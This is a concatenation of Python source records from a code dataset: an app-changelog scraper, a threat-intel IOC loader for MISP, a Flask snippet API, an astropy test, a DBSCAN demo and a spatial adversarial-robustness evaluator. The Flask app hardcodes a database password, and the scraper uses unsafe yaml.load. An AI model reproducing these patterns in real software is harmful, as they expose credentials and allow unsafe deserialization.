\"\"\"\n # print(log)\n detele_char = [\"u'\", 'u\"', \"'\", '\"', \"\",\n \" \", \"
\", '-', '[', ']', \"\"]\n for char in detele_char:\n log = log.replace(char, \"\")\n\n f = codecs.open(\"temp.txt\", \"w\", \"utf-8\")\n f.write(log)\n f.close()\n\n f = open(\"temp.txt\", \"r\")\n log = \"\"\n for line in f:\n log = log + line\n\n f.close()\n\n #log = log.replace(\"\\n\", \" \")\n unicode_logr = {\n \"\\xc2\\xb7\": \"\\n-\",\n \"\\xe2\\x80\\xa2\": \"\\n-\",\n \"\\xe2\\x80\\x94\": \"\\n-\",\n '\\xc3\\xa2\\xc2\\x80\\xc2\\xa2': \"-\",\n '\\xc3\\xb0\\xc2\\x9f\\xc2\\x91\\xc2\\xbb': '',\n '\\xc3\\x82\\xc2\\xa0': ' ',\n '\\xc3\\xa2\\xc2\\x80\\xc2\\x94': ' '\n }\n\n # print log\n\n for key in list(unicode_logr.keys()):\n log = log.replace(key, unicode_logr[key])\n\n return log\n\n\ndef process_response(resp, start_date, database):\n \"\"\"\n Get all the app update activity from start_date.\n \"\"\"\n\n tree = lxml.html.fromstring(resp)\n app_name = tree.xpath(\n '//*[@id=\"bsap_1291153\"]/div[2]/div/div[1]/div[1]/div/h1/text()')[0]\n change_log = \"\"\n for st in tree.xpath('//*[@id=\"bsap_1291153\"]/div[2]/div/div[1]/div[2]/p[2]/text()'):\n change_log = change_log + st\n change_log = format_change_log(change_log)\n\n version_set = tree.xpath(\n '//*[@id=\"bsap_1291153\"]/div[2]/div/div[2]/div[2]/div/ul/li')\n for element in version_set:\n version = element.xpath('b/text()')[0]\n version = version.split()[1]\n date = element.xpath(\"span/text()\")[0]\n date = convert_to_datetime_date(date)\n if date >= start_date:\n log_data(app_name, version, date, change_log, database)\n\n # reset changelog\n change_log = \"\"\n\n\ndef get_params(index_file):\n \"\"\"\n Params:\n index_file (string): index file name.\n\n Returns:\n (dictionary): parameters and values.\n\n >>> params = get_params(\"index.yaml\")\n >>> params['country']\n 'VN'\n >>> params['list_name']\n 'topselling_free'\n >>> params['cat_key']\n 'APPLICATION'\n \"\"\"\n stream = open(index_file, \"r\")\n params = yaml.load(stream)\n stream.close()\n\n return params\n\n\ndef scan_for_change(index_file):\n\n params = get_params(index_file)['change_logs']\n\n database = params['database_name']\n\n today = datetime.date.today()\n\n start_date = today - datetime.timedelta(params['range_of_query'])\n\n for app_info in list(params['apps_src_dest'].keys()):\n print(\"Running: \" + app_info + \"\\n\")\n url = params['apps_src_dest'][app_info][0]\n database = params['dir'] + params['apps_src_dest'][app_info][1]\n resp = start_request(url)\n process_response(resp, start_date, database)\n\n\nprint(\"Program {} start!\".format(__file__))\nscan_for_change('index_ios.yaml')\nprint(\"Program {} finish sucessfully.\".format(__file__))\n\n# if __name__ == \"__main__\":\n# import doctest\n# doctest.testmod()\n", "repo_name": "zenzjtech/Mobile-app-timeline", "sub_path": "change-logs_ios.py", "file_name": "change-logs_ios.py", "file_ext": "py", "file_size_in_byte": 4662, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "datetime.date", "line_number": 33, "usage_type": "call"}, {"api_name": "urllib.request.request.urlopen", "line_number": 37, "usage_type": "call"}, {"api_name": "urllib.request.request", "line_number": 37, "usage_type": "attribute"}, {"api_name": "urllib.request", "line_number": 37, "usage_type": "name"}, {"api_name": "os.path.exists", "line_number": 44, "usage_type": "call"}, {"api_name": "os.path", "line_number": 44, "usage_type": "attribute"}, {"api_name": "csv.writer", "line_number": 56, "usage_type": "call"}, {"api_name": "codecs.open", 
"line_number": 72, "usage_type": "call"}, {"api_name": "lxml.html.fromstring", "line_number": 107, "usage_type": "call"}, {"api_name": "lxml.html", "line_number": 107, "usage_type": "attribute"}, {"api_name": "yaml.load", "line_number": 146, "usage_type": "call"}, {"api_name": "datetime.date.today", "line_number": 158, "usage_type": "call"}, {"api_name": "datetime.date", "line_number": 158, "usage_type": "attribute"}, {"api_name": "datetime.timedelta", "line_number": 160, "usage_type": "call"}]}
+{"seq_id": "23840309202", "text": "import requests\nfrom requests import HTTPError, ConnectionError, ConnectTimeout\nfrom model import Config\nfrom model.events import C2Server, Malware, Actor, Family\nfrom datetime import datetime, timedelta\nimport logging\nimport sys\n\n\nclass Loader:\n\n @staticmethod\n def start(conf, tags, type, startdate, file, noupload, searchfile, proxy_misp_addr, proxy_tie_addr):\n\n # Building Auth Header\n conf_authHeader = {'Authorization': 'Bearer ' + conf.tie_api_key}\n\n # Building URL\n date_since = startdate.strftime(\"%Y-%m-%d\")\n dt = startdate + timedelta(days=1)\n date_until = dt.strftime(\"%Y-%m-%d\")\n category = None\n finished = True\n event = None\n connection_error = False\n\n # Eventtype\n if type == 'c2server':\n event = C2Server(conf.org_name, conf.org_uuid, conf.event_base_thread_level, conf.event_published,\n conf.event_info_c2server, startdate)\n category = 'c2-server'\n elif type == 'malware':\n event = Malware(conf.org_name, conf.org_uuid, conf.event_base_thread_level, conf.event_published,\n conf.event_info_malware, startdate)\n category = 'malware'\n\n elif type == 'actor':\n event = Actor(conf.org_name, conf.org_uuid, conf.event_base_thread_level, conf.event_published,\n conf.event_info_actor, startdate)\n category = 'actor'\n\n elif type == 'family':\n event = Family(conf.org_name, conf.org_uuid, conf.event_base_thread_level, conf.event_published,\n conf.event_info_family, startdate)\n category = 'family'\n\n # Buildung parameters\n payload = dict()\n if category == 'c2-server' or category == 'malware':\n payload['category'] = category\n payload['created_since'] = date_since\n payload['created_until'] = date_until\n\n else:\n attr_list = ''\n count = 0\n for l in searchfile:\n if count is 0:\n attr_list += l\n else:\n attr_list += ',' + l\n count += 1\n attr_list = attr_list.replace('\\n', '')\n if category is 'actor':\n payload['actor'] = attr_list\n else:\n payload['family'] = attr_list\n\n url = conf.tie_api_url + conf.url_iocs\n index = 0\n connection_retrys = 1\n while finished:\n try:\n myResponse = requests.get(url, params=payload, headers=conf_authHeader, proxies=proxy_tie_addr)\n # For successful API call, response code will be 200 (OK)\n if myResponse.ok:\n # print(myResponse.status_code)\n # Loading the response data into a dict variable\n # json.loads takes in only binary or string variables so using content to fetch binary content\n # Loads (Load String) takes a Json file and converts into python data structure\n # (dict or list, depending on JSON)\n\n try:\n jsonResponse = myResponse.json()\n\n # check is TIE Response is complete\n response_has_more = None\n response_iocs = None\n response_params = None\n if 'has_more' in jsonResponse and 'iocs' in jsonResponse and 'params' in jsonResponse:\n response_has_more = jsonResponse['has_more']\n response_iocs = jsonResponse['iocs']\n response_params = jsonResponse['params']\n else:\n raise ValueError(\"Error: TIE answered with an invalid or empty JSON Response\")\n\n # parsing received IOC's\n logging.info(\"Parsing... 
- Offset: \" + str(index) + \" to \" + str(index + len(response_iocs)))\n index += len(response_iocs)\n\n if type == 'c2server':\n C2Server.parse(event, response_iocs, tags)\n elif type == 'malware':\n Malware.parse(event, response_iocs, tags)\n elif type == 'actor':\n Actor.parse(event, response_iocs, tags)\n elif type == 'family':\n Family.parse(event, response_iocs, tags)\n\n if response_has_more is not True:\n finished = False\n logging.info(\"There are no more attributes\")\n logging.info(\"#### Finished #####\")\n break\n else:\n if isinstance(myResponse.links, dict):\n res = myResponse.links[\"next\"]\n url = res[\"url\"]\n logging.info(\"#### Continue #####\")\n\n except ValueError:\n logging.error(\"Error: Invalid or empty JSON Response\")\n elif myResponse.status_code >= 500 and myResponse.status_code <= 550:\n logging.warning(\"It seems there are connection issues with TIE at the moment\")\n logging.warning(\"Status-Code: \" + str(myResponse.status_code) + \" - Try: \" + connection_retrys + \" from 5\")\n\n connection_retrys += 1\n if connection_retrys < 6:\n continue\n else:\n logging.error(\"TIE seems not to be available at the moment or connection is interrupted\")\n raise ConnectionError\n\n else:\n # If response code is not ok (200), print the resulting http error code with description\n logging.error(\"Error:\")\n logging.error(myResponse.content)\n myResponse.raise_for_status()\n except (HTTPError, ConnectionError, ConnectTimeout) as e:\n logging.error(\"Error:\")\n logging.error(\"TIE seems not to be available at the moment or connection is interrupted\")\n connection_error = True\n finished = False\n\n # TIE is available?\n if not noupload and not connection_error and conf.misp_api_key is not None and conf.misp_api_url is not None:\n # Add Base Tags\n if isinstance(event, C2Server):\n if tags.c2tags_base is not None:\n for val in tags.c2tags_base:\n event.append_tags(tags.c2tags_base[val])\n elif isinstance(event, Malware):\n if tags.malwaretags_base is not None:\n for val in tags.c2tags_base:\n event.append_tags(tags.c2tags_base[val])\n\n # Load things up\n try:\n event.upload(conf, proxy_misp_addr)\n except Exception as e:\n logging.error(\"Error uploading event to MISP. Something went wrong...\\n\")\n\n else:\n if not noupload and not connection_error:\n logging.warning(\"Can not upload event. 
MISP API key or MISP API URL is missing\")\n\n if file:\n # Serialize event as MISP Event\n json_output = event.serialize()\n outfile = type + \"_\" + str(event.uuid) + \".json\"\n logging.info(\"Saved attributes as JSON-File: \" + outfile)\n with open(outfile, \"w\") as text_file:\n text_file.write(json_output)\n\n @staticmethod\n def init_logger(logPath, fileName, logLvl, consoleLog, fileLog):\n\n logger = logging.getLogger()\n logger.setLevel(logLvl)\n formatter = logging.Formatter('%(asctime)s [%(levelname)-5.5s] %(message)s')\n\n consoleHandler = logging.StreamHandler(sys.stdout)\n\n consoleHandler.setFormatter(formatter)\n logger.addHandler(consoleHandler)\n\n if consoleLog is False:\n consoleHandler.setLevel(logLvl)\n else:\n consoleHandler.setLevel(100)\n\n if fileLog is False:\n fileHandler = logging.FileHandler(\"{0}/{1}.log\".format(logPath, fileName))\n fileHandler.setFormatter(formatter)\n fileHandler.setLevel(logLvl)\n logger.addHandler(fileHandler)\n\n", "repo_name": "DCSO/tie2misp", "sub_path": "loader.py", "file_name": "loader.py", "file_ext": "py", "file_size_in_byte": 8553, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 3, "dataset": "github-code", "pt": "53", "api": [{"api_name": "datetime.timedelta", "line_number": 20, "usage_type": "call"}, {"api_name": "model.events.C2Server", "line_number": 29, "usage_type": "call"}, {"api_name": "model.events.Malware", "line_number": 33, "usage_type": "call"}, {"api_name": "model.events.Actor", "line_number": 38, "usage_type": "call"}, {"api_name": "model.events.Family", "line_number": 43, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 74, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 98, "usage_type": "call"}, {"api_name": "model.events.C2Server.parse", "line_number": 102, "usage_type": "call"}, {"api_name": "model.events.C2Server", "line_number": 102, "usage_type": "name"}, {"api_name": "model.events.Malware.parse", "line_number": 104, "usage_type": "call"}, {"api_name": "model.events.Malware", "line_number": 104, "usage_type": "name"}, {"api_name": "model.events.Actor.parse", "line_number": 106, "usage_type": "call"}, {"api_name": "model.events.Actor", "line_number": 106, "usage_type": "name"}, {"api_name": "model.events.Family.parse", "line_number": 108, "usage_type": "call"}, {"api_name": "model.events.Family", "line_number": 108, "usage_type": "name"}, {"api_name": "logging.info", "line_number": 112, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 113, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 119, "usage_type": "call"}, {"api_name": "logging.error", "line_number": 122, "usage_type": "call"}, {"api_name": "logging.warning", "line_number": 124, "usage_type": "call"}, {"api_name": "logging.warning", "line_number": 125, "usage_type": "call"}, {"api_name": "logging.error", "line_number": 131, "usage_type": "call"}, {"api_name": "requests.ConnectionError", "line_number": 132, "usage_type": "name"}, {"api_name": "logging.error", "line_number": 136, "usage_type": "call"}, {"api_name": "logging.error", "line_number": 137, "usage_type": "call"}, {"api_name": "requests.HTTPError", "line_number": 139, "usage_type": "name"}, {"api_name": "requests.ConnectionError", "line_number": 139, "usage_type": "name"}, {"api_name": "requests.ConnectTimeout", "line_number": 139, "usage_type": "name"}, {"api_name": "logging.error", "line_number": 140, "usage_type": "call"}, {"api_name": "logging.error", "line_number": 141, "usage_type": "call"}, 
{"api_name": "model.events.C2Server", "line_number": 148, "usage_type": "argument"}, {"api_name": "model.events.Malware", "line_number": 152, "usage_type": "argument"}, {"api_name": "logging.error", "line_number": 161, "usage_type": "call"}, {"api_name": "logging.warning", "line_number": 165, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 171, "usage_type": "call"}, {"api_name": "logging.getLogger", "line_number": 178, "usage_type": "call"}, {"api_name": "logging.Formatter", "line_number": 180, "usage_type": "call"}, {"api_name": "logging.StreamHandler", "line_number": 182, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 182, "usage_type": "attribute"}, {"api_name": "logging.FileHandler", "line_number": 193, "usage_type": "call"}]}
+{"seq_id": "74741752489", "text": "import os\nfrom flask import Flask, jsonify, request, send_from_directory, render_template\nfrom models_wrapper import CodeSnippet\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.orm import sessionmaker\nimport sys\nfrom flask_cors import CORS\nfrom sqlalchemy import or_\n\n# Initialize Flask app\napp = Flask(__name__)\n\n# Add CORS middleware to allow cross-origin requests\ncors = CORS(app)\n\n# Database configurations\nDB_NAME = \"mydatabase\"\nDB_USER = \"your_new_user\"\nDB_PASSWORD = \"qwerty\"\nDB_HOST = \"localhost\"\nDB_PORT = \"5432\"\n\n# Create a database engine and a session factory\nengine = create_engine(f\"postgresql://{DB_USER}:{DB_PASSWORD}@{DB_HOST}:{DB_PORT}/{DB_NAME}\")\nSession = sessionmaker(bind=engine)\n\n# API endpoint to add a new code snippet\n@app.route('/add_snippet', methods=['POST'])\ndef add_snippet():\n # Get the data from the request\n snippet_data = request.json\n\n # Create a session and add a new code snippet to the database\n session = Session()\n new_snippet = CodeSnippet(\n name=snippet_data['name'],\n description=snippet_data['description'],\n file_path=snippet_data['file_path'],\n code=snippet_data['code']\n )\n session.add(new_snippet)\n session.commit()\n\n # Return a success message\n return jsonify({'message': 'Code snippet added successfully.'})\n\n# API endpoint to search code snippets\n@app.route('/search', methods=['POST'])\ndef search_code_snippets():\n # Get search criteria from the request\n search_data = request.json\n\n # Create a session and query the database\n session = Session()\n query = session.query(CodeSnippet)\n\n # Apply search filters\n query = query.filter(\n or_(\n CodeSnippet.name.contains(search_data['name']),\n CodeSnippet.description.contains(search_data['description']),\n CodeSnippet.code.contains(search_data['code'])\n )\n )\n\n # Fetch results and convert them to a list of dictionaries\n results = query.all()\n response_data = [{'id': result.id, 'name': result.name, 'description': result.description, 'file_path': result.file_path, 'code': result.code, 'latest_commit': result.latest_commit} for result in results]\n\n # Debugging\n print('Search data:', search_data)\n print('Query:', query)\n print('Results:', results)\n print('Response data:', response_data)\n\n # Print executed SQL\n print(\"Executed SQL:\", query.statement.compile(compile_kwargs={\"literal_binds\": True}))\n\n # Return JSON response\n return jsonify(response_data)\n\n@app.route('/generate', methods=['POST'])\ndef generate():\n data = request.get_json()\n input_text = data.get('input')\n code_snippet = CodeSnippet(input_text)\n code = code_snippet.generate_code()\n return jsonify({\"code\": code})\n\n@app.route('/index1.html')\ndef index1():\n return send_from_directory(os.path.join(os.path.dirname(__file__), 'templates'), 'index1.html')\n\n@app.route('/get_all_files', methods=['GET'])\ndef get_all_files():\n # Create a session and query the database\n session = Session()\n query = session.query(CodeSnippet)\n\n # Fetch all code snippets\n results = query.all()\n\n # Organize the results in a list of dictionaries\n organized_data = []\n for result in results:\n organized_data.append({\n 'script_name': result.name,\n 'description': result.description,\n 'id': result.id,\n 'file_path': result.file_path,\n 'code': result.code,\n 'latest_commit': result.latest_commit\n })\n\n # Return JSON response\n return jsonify(organized_data)\n\n@app.route('/view_json')\ndef view_json():\n # Get the code snippets as a JSON 
string\n json_data = get_all_files().get_data(as_text=True)\n\n return render_template('view_json.html', json_data=json_data)\n\n\n\n\ndef run():\n app.run(debug=True, use_reloader=False)\n\n# Run Flask app\nif __name__ == '__main__':\n run()\n", "repo_name": "thepwnman33/Magicus", "sub_path": "apitest.py", "file_name": "apitest.py", "file_ext": "py", "file_size_in_byte": 3920, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "flask.Flask", "line_number": 11, "usage_type": "call"}, {"api_name": "flask_cors.CORS", "line_number": 14, "usage_type": "call"}, {"api_name": "sqlalchemy.create_engine", "line_number": 24, "usage_type": "call"}, {"api_name": "sqlalchemy.orm.sessionmaker", "line_number": 25, "usage_type": "call"}, {"api_name": "flask.request.json", "line_number": 31, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 31, "usage_type": "name"}, {"api_name": "models_wrapper.CodeSnippet", "line_number": 35, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 45, "usage_type": "call"}, {"api_name": "flask.request.json", "line_number": 51, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 51, "usage_type": "name"}, {"api_name": "models_wrapper.CodeSnippet", "line_number": 55, "usage_type": "argument"}, {"api_name": "sqlalchemy.or_", "line_number": 59, "usage_type": "call"}, {"api_name": "models_wrapper.CodeSnippet.name.contains", "line_number": 60, "usage_type": "call"}, {"api_name": "models_wrapper.CodeSnippet.name", "line_number": 60, "usage_type": "attribute"}, {"api_name": "models_wrapper.CodeSnippet", "line_number": 60, "usage_type": "name"}, {"api_name": "models_wrapper.CodeSnippet.description.contains", "line_number": 61, "usage_type": "call"}, {"api_name": "models_wrapper.CodeSnippet.description", "line_number": 61, "usage_type": "attribute"}, {"api_name": "models_wrapper.CodeSnippet", "line_number": 61, "usage_type": "name"}, {"api_name": "models_wrapper.CodeSnippet.code.contains", "line_number": 62, "usage_type": "call"}, {"api_name": "models_wrapper.CodeSnippet.code", "line_number": 62, "usage_type": "attribute"}, {"api_name": "models_wrapper.CodeSnippet", "line_number": 62, "usage_type": "name"}, {"api_name": "flask.jsonify", "line_number": 80, "usage_type": "call"}, {"api_name": "flask.request.get_json", "line_number": 84, "usage_type": "call"}, {"api_name": "flask.request", "line_number": 84, "usage_type": "name"}, {"api_name": "models_wrapper.CodeSnippet", "line_number": 86, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 88, "usage_type": "call"}, {"api_name": "flask.send_from_directory", "line_number": 92, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 92, "usage_type": "call"}, {"api_name": "os.path", "line_number": 92, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 92, "usage_type": "call"}, {"api_name": "models_wrapper.CodeSnippet", "line_number": 98, "usage_type": "argument"}, {"api_name": "flask.jsonify", "line_number": 116, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 123, "usage_type": "call"}]}
+{"seq_id": "30827508988", "text": "# Licensed under a 3-clause BSD style license - see LICENSE.rst\n\nimport pytest\n\nfrom astropy import cosmology\nfrom astropy.cosmology import Cosmology\nfrom astropy.cosmology.core import _COSMOLOGY_CLASSES\nfrom astropy.table import QTable, vstack\nfrom astropy.utils.compat import optional_deps\nfrom astropy.utils.exceptions import AstropyUserWarning\n\n\nclass CosmologyWithKwargs(Cosmology):\n def __init__(self, name=\"cosmology with kwargs\", meta=None, **kwargs):\n super().__init__(name=name, meta=meta)\n\n\ncosmo_instances = [\n getattr(cosmology.realizations, name) for name in cosmology.parameters.available\n]\ncosmo_instances.append(CosmologyWithKwargs())\n\n\ndef teardown_module(module):\n # pop CosmologyWithKwargs from registered classes\n # but don't error b/c it fails in parallel\n _COSMOLOGY_CLASSES.pop(CosmologyWithKwargs.__qualname__, None)\n\n\n###############################################################################\n\n@pytest.mark.parametrize(\"expected\", cosmo_instances)\ndef test_to_from_mapping_instance(expected):\n # ------------\n # To Mapping\n params = expected.to_format('mapping')\n\n assert isinstance(params, dict)\n assert params[\"cosmology\"] is expected.__class__\n assert params[\"name\"] == expected.name\n\n # ------------\n # From Mapping\n params[\"mismatching\"] = \"will error\"\n\n # tests are different if the last argument is a **kwarg\n if tuple(expected._init_signature.parameters.values())[-1].kind == 4:\n got = Cosmology.from_format(params, format=\"mapping\")\n\n assert got.__class__ == expected.__class__\n assert got.name == expected.name\n assert \"mismatching\" not in got.meta\n\n return # don't continue testing\n\n # read with mismatching parameters errors\n with pytest.raises(TypeError, match=\"there are unused parameters\"):\n Cosmology.from_format(params, format=\"mapping\")\n\n # unless mismatched are moved to meta\n got = Cosmology.from_format(params, format=\"mapping\", move_to_meta=True)\n assert got.__class__ == expected.__class__\n assert got == expected\n assert got.meta[\"mismatching\"] == \"will error\"\n\n # it won't error if everything matches up\n params.pop(\"mismatching\")\n got = Cosmology.from_format(params, format=\"mapping\")\n assert got.__class__ == expected.__class__\n assert got == expected\n\n # and it will also work if the cosmology is a string\n params[\"cosmology\"] = params[\"cosmology\"].__name__\n got = Cosmology.from_format(params, format=\"mapping\")\n assert got == expected\n\n # also it auto-identifies 'format'\n got = Cosmology.from_format(params)\n assert got == expected\n", "repo_name": "CNwangbin/astropy", "sub_path": "astropy/cosmology/io/tests/test_mapping.py", "file_name": "test_mapping.py", "file_ext": "py", "file_size_in_byte": 2649, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "github-code", "pt": "53", "api": [{"api_name": "astropy.cosmology.Cosmology", "line_number": 13, "usage_type": "name"}, {"api_name": "astropy.cosmology.realizations", "line_number": 19, "usage_type": "attribute"}, {"api_name": "astropy.cosmology", "line_number": 19, "usage_type": "name"}, {"api_name": "astropy.cosmology.parameters", "line_number": 19, "usage_type": "attribute"}, {"api_name": "astropy.cosmology.core._COSMOLOGY_CLASSES.pop", "line_number": 27, "usage_type": "call"}, {"api_name": "astropy.cosmology.core._COSMOLOGY_CLASSES", "line_number": 27, "usage_type": "name"}, {"api_name": "astropy.cosmology.Cosmology.from_format", "line_number": 48, 
"usage_type": "call"}, {"api_name": "astropy.cosmology.Cosmology", "line_number": 48, "usage_type": "name"}, {"api_name": "pytest.raises", "line_number": 57, "usage_type": "call"}, {"api_name": "astropy.cosmology.Cosmology.from_format", "line_number": 58, "usage_type": "call"}, {"api_name": "astropy.cosmology.Cosmology", "line_number": 58, "usage_type": "name"}, {"api_name": "astropy.cosmology.Cosmology.from_format", "line_number": 61, "usage_type": "call"}, {"api_name": "astropy.cosmology.Cosmology", "line_number": 61, "usage_type": "name"}, {"api_name": "astropy.cosmology.Cosmology.from_format", "line_number": 68, "usage_type": "call"}, {"api_name": "astropy.cosmology.Cosmology", "line_number": 68, "usage_type": "name"}, {"api_name": "astropy.cosmology.Cosmology.from_format", "line_number": 74, "usage_type": "call"}, {"api_name": "astropy.cosmology.Cosmology", "line_number": 74, "usage_type": "name"}, {"api_name": "astropy.cosmology.Cosmology.from_format", "line_number": 78, "usage_type": "call"}, {"api_name": "astropy.cosmology.Cosmology", "line_number": 78, "usage_type": "name"}, {"api_name": "pytest.mark.parametrize", "line_number": 32, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 32, "usage_type": "attribute"}]}
+{"seq_id": "9261746599", "text": "# DBSCAN聚类\r\nfrom sklearn import datasets\r\nimport numpy as np\r\nimport random\r\nimport matplotlib.pyplot as plt\r\nimport time\r\nimport copy\r\ndef find_neighbor(j, x, eps):\r\n N = list()\r\n for i in range(x.shape[0]):\r\n # 计算欧式距离\r\n temp = np.sqrt(np.sum(np.square(x[j] - x[i])))\r\n if temp <= eps:\r\n N.append(i)\r\n return set(N)\r\ndef DBSCAN(X, eps, min_Pts):\r\n k = -1\r\n neighbor_list = [] # 用来保存每个数据的邻域\r\n omega_list = [] # 核心对象集合\r\n # 初始时将所有点标记为未访问\r\n gama = set([x for x in range(len(X))])\r\n cluster = [-1 for _ in range(len(X))] # 聚类\r\n for i in range(len(X)):\r\n neighbor_list.append(find_neighbor(i, X, eps))\r\n if len(neighbor_list[-1]) >= min_Pts:\r\n # 将样本加入核心对象集合\r\n omega_list.append(i)\r\n # 转化为集合便于操作\r\n omega_list = set(omega_list)\r\n while len(omega_list) > 0:\r\n gama_old = copy.deepcopy(gama)\r\n # 随机选取一个核心对象\r\n j = random.choice(list(omega_list))\r\n k = k + 1\r\n Q = list()\r\n Q.append(j)\r\n gama.remove(j)\r\n while len(Q) > 0:\r\n q = Q[0]\r\n Q.remove(q)\r\n if len(neighbor_list[q]) >= min_Pts:\r\n delta = neighbor_list[q] &gama\r\n deltalist = list(delta)\r\n for i in range(len(delta)):\r\n Q.append(deltalist[i])\r\n gama = gama - delta\r\n Ck = gama_old - gama\r\n Cklist = list(Ck)\r\n for i in range(len(Ck)):\r\n cluster[Cklist[i]] = k\r\n omega_list = omega_list - Ck\r\n return cluster\r\nX1, y1 = datasets.make_circles(n_samples=2000, factor=.6, noise=.02)\r\nX2, y2 = datasets.make_blobs(n_samples=400, n_features=2, centers=[[1.2, 1.2]], cluster_std=[[.1]], random_state=9)\r\nX = np.concatenate((X1, X2))\r\neps = 0.08\r\nmin_Pts = 10\r\nbegin = time.time()\r\nC = DBSCAN(X, eps, min_Pts)\r\nend = time.time()\r\nplt.figure()\r\nplt.scatter(X[:, 0], X[:, 1], c=C)\r\nplt.show()", "repo_name": "HuichuanLI/play_with_machine_learning_book", "sub_path": "一些经典的机器学习的实现/DBSCAN.py", "file_name": "DBSCAN.py", "file_ext": "py", "file_size_in_byte": 2099, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "numpy.sqrt", "line_number": 12, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 12, "usage_type": "call"}, {"api_name": "numpy.square", "line_number": 12, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 31, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 33, "usage_type": "call"}, {"api_name": "sklearn.datasets.make_circles", "line_number": 53, "usage_type": "call"}, {"api_name": "sklearn.datasets", "line_number": 53, "usage_type": "name"}, {"api_name": "sklearn.datasets.make_blobs", "line_number": 54, "usage_type": "call"}, {"api_name": "sklearn.datasets", "line_number": 54, "usage_type": "name"}, {"api_name": "numpy.concatenate", "line_number": 55, "usage_type": "call"}, {"api_name": "time.time", "line_number": 58, "usage_type": "call"}, {"api_name": "time.time", "line_number": 60, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 61, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 61, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 62, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 62, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 63, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 63, "usage_type": "name"}]}
+{"seq_id": "34177809772", "text": "from __future__ import print_function\nimport os\nimport itertools\nimport re\nimport argparse\nimport logging\nimport torch\nimport torch.nn as nn\nfrom torch.autograd import Variable\nfrom datasets import SemiSupervisedDataset, DATASETS\nfrom torchvision import transforms\nimport torch.backends.cudnn as cudnn\nfrom utils import get_model\nimport spatial\nimport json\n\nNUM_ROT = 31\nNUM_TRANS = 5\n\nuse_cuda = torch.cuda.is_available()\ndevice = torch.device(\"cuda\" if use_cuda else \"cpu\")\n\n\ndef transform(x, rotation, translation):\n assert x.shape[1] == 3\n\n with torch.no_grad():\n translated = spatial.transform(x, rotation, translation)\n\n return translated\n\n\ndef get_spatial_adv_example(model, X, y, max_rot=30, max_trans=0.1071):\n\n def calc_correct(inp):\n output = model(inp)\n targets = y.repeat([inp.shape[0]])\n return (output.argmax(dim=1) == targets).long()\n\n with torch.no_grad():\n rots = torch.linspace(-max_rot, max_rot, steps=NUM_ROT)\n trans = torch.linspace(-max_trans, max_trans, steps=NUM_TRANS)\n tfms = torch.tensor(list(itertools.product(rots, trans, trans))).cuda(device=device)\n all_rots = tfms[:, 0]\n all_trans = tfms[:, 1:]\n\n ntfm = all_rots.shape[0]\n transformed = transform(X.repeat([ntfm, 1, 1, 1]), all_rots, all_trans)\n torch.clamp(transformed, 0, 1.0)\n\n # X_pgd = Variable(torch.zeros(X.data.shape), requires_grad=True)\n MAX_BS = 128\n i = 0\n while i < ntfm:\n to_do = transformed[i:i+MAX_BS]\n is_correct = calc_correct(to_do)\n argmin = is_correct.argmin()\n if is_correct[argmin] == 0:\n return transformed[i+argmin:i+argmin+1].squeeze_(0)\n\n i += MAX_BS\n else:\n return transformed[0:1].squeeze_(0)\n\n\ndef apply(func, M):\n tList = [func(m) for m in torch.unbind(M, dim=0)]\n return torch.stack(tList, dim=0)\n\n\ndef get_batch_spatial_adv_example(model, X, y, max_rot=30, max_trans=0.1071, random=False, wo10=False):\n def calc_correct(inp):\n output = model(inp)\n return (output.argmax(dim=1) == y).long()\n\n if random:\n bs = X.shape[0]\n rots = spatial.unif((bs,), -max_rot, max_rot)\n txs = spatial.unif((bs, 2), -max_trans, max_trans)\n transformed = transform(X, rots, txs)\n return transformed\n\n elif wo10:\n all_transformed = []\n all_is_corrects = []\n for i in range(10):\n bs = X.shape[0]\n rots = spatial.unif((bs,), -max_rot, max_rot)\n txs = spatial.unif((bs, 2), -max_trans, max_trans)\n transformed = transform(X, rots, txs)\n all_transformed.append(transformed)\n all_is_corrects.append(calc_correct(transformed))\n aic = torch.stack(all_is_corrects, dim=0).argmin(dim=0)\n all_transformed = torch.stack(all_transformed, dim=0)\n X_pgd = []\n for j, i in enumerate(torch.unbind(aic, dim=0)):\n X_pgd.append(all_transformed[i, j])\n X_pgd = torch.stack(X_pgd, dim=0)\n return X_pgd\n else:\n # otherwise grid\n X_pgd = []\n for cur_x, cur_y in zip(torch.unbind(X, dim=0), torch.unbind(y, dim=0)):\n X_pgd.append(get_spatial_adv_example(model, cur_x, cur_y, max_rot, max_trans))\n X_pgd = torch.stack(X_pgd, dim=0)\n return X_pgd\n\n\ndef pgd_whitebox_spatial(model, X, y, max_rot=30, max_trans=0.1071, random=False, eval=False):\n wo10 = (not random and not eval)\n X_pgd = get_batch_spatial_adv_example(model, X, y, max_rot, max_trans, random=random, wo10=wo10)\n err = 